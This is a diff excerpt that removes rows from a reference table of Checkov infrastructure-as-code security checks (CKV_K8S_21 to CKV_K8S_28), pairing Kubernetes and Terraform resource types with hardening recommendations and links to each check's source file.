-| 2612 | CKV_K8S_21               | resource                         | Pod                                                                                              | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                      |
-| 2613 | CKV_K8S_21               | resource                         | ReplicaSet                                                                                       | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                      |
-| 2614 | CKV_K8S_21               | resource                         | ReplicationController                                                                            | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                      |
-| 2615 | CKV_K8S_21               | resource                         | Role                                                                                             | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                      |
-| 2616 | CKV_K8S_21               | resource                         | RoleBinding                                                                                      | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                      |
-| 2617 | CKV_K8S_21               | resource                         | Secret                                                                                           | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                      |
-| 2618 | CKV_K8S_21               | resource                         | Service                                                                                          | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                      |
-| 2619 | CKV_K8S_21               | resource                         | ServiceAccount                                                                                   | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                      |
-| 2620 | CKV_K8S_21               | resource                         | StatefulSet                                                                                      | The default namespace should not be used                                                                                                                                                                 | Kubernetes              | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py)                                                                                      |
-| 2621 | CKV_K8S_21               | resource                         | kubernetes_config_map                                                                            | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2622 | CKV_K8S_21               | resource                         | kubernetes_config_map_v1                                                                         | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2623 | CKV_K8S_21               | resource                         | kubernetes_cron_job                                                                              | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2624 | CKV_K8S_21               | resource                         | kubernetes_cron_job_v1                                                                           | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2625 | CKV_K8S_21               | resource                         | kubernetes_daemon_set_v1                                                                         | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2626 | CKV_K8S_21               | resource                         | kubernetes_daemonset                                                                             | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2627 | CKV_K8S_21               | resource                         | kubernetes_deployment                                                                            | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2628 | CKV_K8S_21               | resource                         | kubernetes_deployment_v1                                                                         | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2629 | CKV_K8S_21               | resource                         | kubernetes_ingress                                                                               | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2630 | CKV_K8S_21               | resource                         | kubernetes_ingress_v1                                                                            | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2631 | CKV_K8S_21               | resource                         | kubernetes_job                                                                                   | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2632 | CKV_K8S_21               | resource                         | kubernetes_job_v1                                                                                | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2633 | CKV_K8S_21               | resource                         | kubernetes_pod                                                                                   | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2634 | CKV_K8S_21               | resource                         | kubernetes_pod_v1                                                                                | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2635 | CKV_K8S_21               | resource                         | kubernetes_replication_controller                                                                | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2636 | CKV_K8S_21               | resource                         | kubernetes_replication_controller_v1                                                             | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2637 | CKV_K8S_21               | resource                         | kubernetes_role_binding                                                                          | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2638 | CKV_K8S_21               | resource                         | kubernetes_role_binding_v1                                                                       | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2639 | CKV_K8S_21               | resource                         | kubernetes_secret                                                                                | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2640 | CKV_K8S_21               | resource                         | kubernetes_secret_v1                                                                             | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2641 | CKV_K8S_21               | resource                         | kubernetes_service                                                                               | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2642 | CKV_K8S_21               | resource                         | kubernetes_service_account                                                                       | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2643 | CKV_K8S_21               | resource                         | kubernetes_service_account_v1                                                                    | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2644 | CKV_K8S_21               | resource                         | kubernetes_service_v1                                                                            | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2645 | CKV_K8S_21               | resource                         | kubernetes_stateful_set                                                                          | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2646 | CKV_K8S_21               | resource                         | kubernetes_stateful_set_v1                                                                       | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 2647 | CKV_K8S_22               | resource                         | CronJob                                                                                          | Use read-only filesystem for containers where possible                                                                                                                                                   | Kubernetes              | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py)                                                                                  |
-| 2648 | CKV_K8S_22               | resource                         | DaemonSet                                                                                        | Use read-only filesystem for containers where possible                                                                                                                                                   | Kubernetes              | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py)                                                                                  |
-| 2649 | CKV_K8S_22               | resource                         | Deployment                                                                                       | Use read-only filesystem for containers where possible                                                                                                                                                   | Kubernetes              | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py)                                                                                  |
-| 2650 | CKV_K8S_22               | resource                         | DeploymentConfig                                                                                 | Use read-only filesystem for containers where possible                                                                                                                                                   | Kubernetes              | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py)                                                                                  |
-| 2651 | CKV_K8S_22               | resource                         | Job                                                                                              | Use read-only filesystem for containers where possible                                                                                                                                                   | Kubernetes              | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py)                                                                                  |
-| 2652 | CKV_K8S_22               | resource                         | Pod                                                                                              | Use read-only filesystem for containers where possible                                                                                                                                                   | Kubernetes              | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py)                                                                                  |
-| 2653 | CKV_K8S_22               | resource                         | PodTemplate                                                                                      | Use read-only filesystem for containers where possible                                                                                                                                                   | Kubernetes              | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py)                                                                                  |
-| 2654 | CKV_K8S_22               | resource                         | ReplicaSet                                                                                       | Use read-only filesystem for containers where possible                                                                                                                                                   | Kubernetes              | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py)                                                                                  |
-| 2655 | CKV_K8S_22               | resource                         | ReplicationController                                                                            | Use read-only filesystem for containers where possible                                                                                                                                                   | Kubernetes              | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py)                                                                                  |
-| 2656 | CKV_K8S_22               | resource                         | StatefulSet                                                                                      | Use read-only filesystem for containers where possible                                                                                                                                                   | Kubernetes              | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py)                                                                                  |
-| 2657 | CKV_K8S_22               | resource                         | kubernetes_deployment                                                                            | Use read-only filesystem for containers where possible                                                                                                                                                   | Terraform               | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py)                                                                    |
-| 2658 | CKV_K8S_22               | resource                         | kubernetes_deployment_v1                                                                         | Use read-only filesystem for containers where possible                                                                                                                                                   | Terraform               | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py)                                                                    |
-| 2659 | CKV_K8S_22               | resource                         | kubernetes_pod                                                                                   | Use read-only filesystem for containers where possible                                                                                                                                                   | Terraform               | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py)                                                                    |
-| 2660 | CKV_K8S_22               | resource                         | kubernetes_pod_v1                                                                                | Use read-only filesystem for containers where possible                                                                                                                                                   | Terraform               | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py)                                                                    |
-| 2661 | CKV_K8S_23               | resource                         | CronJob                                                                                          | Minimize the admission of root containers                                                                                                                                                                | Kubernetes              | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py)                                                                                          |
-| 2662 | CKV_K8S_23               | resource                         | DaemonSet                                                                                        | Minimize the admission of root containers                                                                                                                                                                | Kubernetes              | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py)                                                                                          |
-| 2663 | CKV_K8S_23               | resource                         | Deployment                                                                                       | Minimize the admission of root containers                                                                                                                                                                | Kubernetes              | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py)                                                                                          |
-| 2664 | CKV_K8S_23               | resource                         | Job                                                                                              | Minimize the admission of root containers                                                                                                                                                                | Kubernetes              | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py)                                                                                          |
-| 2665 | CKV_K8S_23               | resource                         | Pod                                                                                              | Minimize the admission of root containers                                                                                                                                                                | Kubernetes              | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py)                                                                                          |
-| 2666 | CKV_K8S_23               | resource                         | ReplicaSet                                                                                       | Minimize the admission of root containers                                                                                                                                                                | Kubernetes              | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py)                                                                                          |
-| 2667 | CKV_K8S_23               | resource                         | ReplicationController                                                                            | Minimize the admission of root containers                                                                                                                                                                | Kubernetes              | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py)                                                                                          |
-| 2668 | CKV_K8S_23               | resource                         | StatefulSet                                                                                      | Minimize the admission of root containers                                                                                                                                                                | Kubernetes              | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py)                                                                                          |
-| 2669 | CKV_K8S_24               | resource                         | PodSecurityPolicy                                                                                | Do not allow containers with added capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesPSP.py)                                                                          |
-| 2670 | CKV_K8S_24               | resource                         | kubernetes_pod_security_policy                                                                   | Do not allow containers with added capability                                                                                                                                                            | Terraform               | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesPSP.py)                                                                    |
-| 2671 | CKV_K8S_25               | resource                         | CronJob                                                                                          | Minimize the admission of containers with added capability                                                                                                                                               | Kubernetes              | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py)                                                                                |
-| 2672 | CKV_K8S_25               | resource                         | DaemonSet                                                                                        | Minimize the admission of containers with added capability                                                                                                                                               | Kubernetes              | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py)                                                                                |
-| 2673 | CKV_K8S_25               | resource                         | Deployment                                                                                       | Minimize the admission of containers with added capability                                                                                                                                               | Kubernetes              | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py)                                                                                |
-| 2674 | CKV_K8S_25               | resource                         | DeploymentConfig                                                                                 | Minimize the admission of containers with added capability                                                                                                                                               | Kubernetes              | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py)                                                                                |
-| 2675 | CKV_K8S_25               | resource                         | Job                                                                                              | Minimize the admission of containers with added capability                                                                                                                                               | Kubernetes              | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py)                                                                                |
-| 2676 | CKV_K8S_25               | resource                         | Pod                                                                                              | Minimize the admission of containers with added capability                                                                                                                                               | Kubernetes              | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py)                                                                                |
-| 2677 | CKV_K8S_25               | resource                         | PodTemplate                                                                                      | Minimize the admission of containers with added capability                                                                                                                                               | Kubernetes              | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py)                                                                                |
-| 2678 | CKV_K8S_25               | resource                         | ReplicaSet                                                                                       | Minimize the admission of containers with added capability                                                                                                                                               | Kubernetes              | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py)                                                                                |
-| 2679 | CKV_K8S_25               | resource                         | ReplicationController                                                                            | Minimize the admission of containers with added capability                                                                                                                                               | Kubernetes              | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py)                                                                                |
-| 2680 | CKV_K8S_25               | resource                         | StatefulSet                                                                                      | Minimize the admission of containers with added capability                                                                                                                                               | Kubernetes              | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py)                                                                                |
-| 2681 | CKV_K8S_25               | resource                         | kubernetes_deployment                                                                            | Minimize the admission of containers with added capability                                                                                                                                               | Terraform               | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py)                                                                          |
-| 2682 | CKV_K8S_25               | resource                         | kubernetes_deployment_v1                                                                         | Minimize the admission of containers with added capability                                                                                                                                               | Terraform               | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py)                                                                          |
-| 2683 | CKV_K8S_25               | resource                         | kubernetes_pod                                                                                   | Minimize the admission of containers with added capability                                                                                                                                               | Terraform               | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py)                                                                          |
-| 2684 | CKV_K8S_25               | resource                         | kubernetes_pod_v1                                                                                | Minimize the admission of containers with added capability                                                                                                                                               | Terraform               | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py)                                                                          |
-| 2685 | CKV_K8S_26               | resource                         | CronJob                                                                                          | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Kubernetes              | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py)                                                                                                      |
-| 2686 | CKV_K8S_26               | resource                         | DaemonSet                                                                                        | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Kubernetes              | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py)                                                                                                      |
-| 2687 | CKV_K8S_26               | resource                         | Deployment                                                                                       | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Kubernetes              | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py)                                                                                                      |
-| 2688 | CKV_K8S_26               | resource                         | DeploymentConfig                                                                                 | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Kubernetes              | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py)                                                                                                      |
-| 2689 | CKV_K8S_26               | resource                         | Job                                                                                              | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Kubernetes              | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py)                                                                                                      |
-| 2690 | CKV_K8S_26               | resource                         | Pod                                                                                              | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Kubernetes              | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py)                                                                                                      |
-| 2691 | CKV_K8S_26               | resource                         | PodTemplate                                                                                      | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Kubernetes              | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py)                                                                                                      |
-| 2692 | CKV_K8S_26               | resource                         | ReplicaSet                                                                                       | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Kubernetes              | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py)                                                                                                      |
-| 2693 | CKV_K8S_26               | resource                         | ReplicationController                                                                            | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Kubernetes              | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py)                                                                                                      |
-| 2694 | CKV_K8S_26               | resource                         | StatefulSet                                                                                      | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Kubernetes              | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py)                                                                                                      |
-| 2695 | CKV_K8S_26               | resource                         | kubernetes_deployment                                                                            | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Terraform               | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py)                                                                                                |
-| 2696 | CKV_K8S_26               | resource                         | kubernetes_deployment_v1                                                                         | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Terraform               | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py)                                                                                                |
-| 2697 | CKV_K8S_26               | resource                         | kubernetes_pod                                                                                   | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Terraform               | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py)                                                                                                |
-| 2698 | CKV_K8S_26               | resource                         | kubernetes_pod_v1                                                                                | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Terraform               | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py)                                                                                                |
-| 2699 | CKV_K8S_27               | resource                         | CronJob                                                                                          | Do not expose the docker daemon socket to containers                                                                                                                                                     | Kubernetes              | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py)                                                                                  |
-| 2700 | CKV_K8S_27               | resource                         | DaemonSet                                                                                        | Do not expose the docker daemon socket to containers                                                                                                                                                     | Kubernetes              | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py)                                                                                  |
-| 2701 | CKV_K8S_27               | resource                         | Deployment                                                                                       | Do not expose the docker daemon socket to containers                                                                                                                                                     | Kubernetes              | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py)                                                                                  |
-| 2702 | CKV_K8S_27               | resource                         | Job                                                                                              | Do not expose the docker daemon socket to containers                                                                                                                                                     | Kubernetes              | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py)                                                                                  |
-| 2703 | CKV_K8S_27               | resource                         | Pod                                                                                              | Do not expose the docker daemon socket to containers                                                                                                                                                     | Kubernetes              | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py)                                                                                  |
-| 2704 | CKV_K8S_27               | resource                         | ReplicaSet                                                                                       | Do not expose the docker daemon socket to containers                                                                                                                                                     | Kubernetes              | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py)                                                                                  |
-| 2705 | CKV_K8S_27               | resource                         | ReplicationController                                                                            | Do not expose the docker daemon socket to containers                                                                                                                                                     | Kubernetes              | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py)                                                                                  |
-| 2706 | CKV_K8S_27               | resource                         | StatefulSet                                                                                      | Do not expose the docker daemon socket to containers                                                                                                                                                     | Kubernetes              | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py)                                                                                  |
-| 2707 | CKV_K8S_27               | resource                         | kubernetes_daemon_set_v1                                                                         | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform               | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                            |
-| 2708 | CKV_K8S_27               | resource                         | kubernetes_daemonset                                                                             | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform               | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                            |
-| 2709 | CKV_K8S_27               | resource                         | kubernetes_deployment                                                                            | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform               | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                            |
-| 2710 | CKV_K8S_27               | resource                         | kubernetes_deployment_v1                                                                         | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform               | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                            |
-| 2711 | CKV_K8S_27               | resource                         | kubernetes_pod                                                                                   | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform               | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                            |
-| 2712 | CKV_K8S_27               | resource                         | kubernetes_pod_v1                                                                                | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform               | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                            |
-| 2713 | CKV_K8S_28               | resource                         | CronJob                                                                                          | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Kubernetes              | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py)                                                                                      |
-| 2714 | CKV_K8S_28               | resource                         | DaemonSet                                                                                        | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Kubernetes              | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py)                                                                                      |
-| 2715 | CKV_K8S_28               | resource                         | Deployment                                                                                       | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Kubernetes              | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py)                                                                                      |
-| 2716 | CKV_K8S_28               | resource                         | DeploymentConfig                                                                                 | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Kubernetes              | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py)                                                                                      |
